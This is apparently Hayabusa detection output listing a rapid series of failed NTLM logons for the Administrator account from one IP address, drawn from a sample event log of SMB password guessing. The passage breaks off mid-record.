+2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1swKSla5gkdOwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kL9MdVnRVogiP7hF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aQ0hRdwZvC5PBcXl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ctbv73J0Dot9raD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wKpWApJIKkjbtaPB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kVTAv9VoNpUyxQFM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xb3t1dpuk9JZri5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fy0UrW8TWrxAOX90 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iUXUbUsiE6Ahh9iD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2QQdQ6rQYLBf15AF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zG4eJLuQ4u2dKQG0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: QCfwHs2gVGiRc3Fy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67TcwQfTxgTtQvCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imnSPKAKYzrCKSUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMNbdjiXNUY0gTfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOAH0gjfs8JcXSMO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TnnB4KPBiDvKMsUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aZRgpa5riqIEWhQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBL4nrs7f6cjlfsT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fgDupzqipe5jK0r5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5yPcTOWPuN8efJtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dszb6s0w6glvSkSw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ynu936pVVAuDUGT5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c55o3Dca2tiUVwb2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnDmp2KK02LyJ7Xm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRUKrHDAmgEPcjQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PCGKDvPhzg6BlsuU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OU28biGLJkFmB117 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 029LphuWcoo9S2hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItIROqP2wyzLJa9s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XngGun3HYopTkcrA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c91Qz5QNUczcm7m6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7nyWJJJhDiqnf1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnj7hAp20gZE9FCe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FydQjBxO7XninU5Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P8InIzyD86BXr1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvKGa3A3qw7s0cZX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QTY7tRVEMjXZXFyH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4Ij1NSYGYbq4PxS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 47fOxZAYhjxLzEoU | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGxXaNNChVScbHe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jTcVeB8f2Rs3Bldo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeSnUlIbuDVNffey | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eXIM4tWru1x0AahJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m2pBLn6aO8L4kiH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: EG5daDsgTMZsNg0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3V8z6j7GLO3ywBXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AsezMvhUNedLNqg4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h16AvUVZG8qch7LC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PB5xe3Aieya8N3IU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezGXIhYrkk2Q9pe5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VSGIVhD6pO5z47DY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2vEjOhJW9G3aIfV0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hyvCpW3aOZqCOldu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhS2wAAkfmZuLll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bEh0KTMbbFtsfck | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mw9u61efa06vYv6L | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SAxij8QYLxxriIvu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HK2tbzICSpTrglud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rHJ70VrEwCQjSvL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qwZT66ExkdJDZaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezuHluj1fEC9KdQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: bXH5uDfo4WB6QEnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWvZjuZhnGcrelOM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vb6ePjmpA8ZwK1PW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1A9ZY20WM8oDn6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71GKLnXqSEEuc1Fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w0GsW0vDEkpRa1X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0HH6zUUoL0qlfFC2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AG4pYsjob1iwlOc0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dNCX5tZ0nF1foTLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vO82Kb0kboVFuJy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DptE2C8ZK3AxCb43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NC8manvVP5pU8F3N | IP Addr: 192.168.198.149 | AuthPackage: 
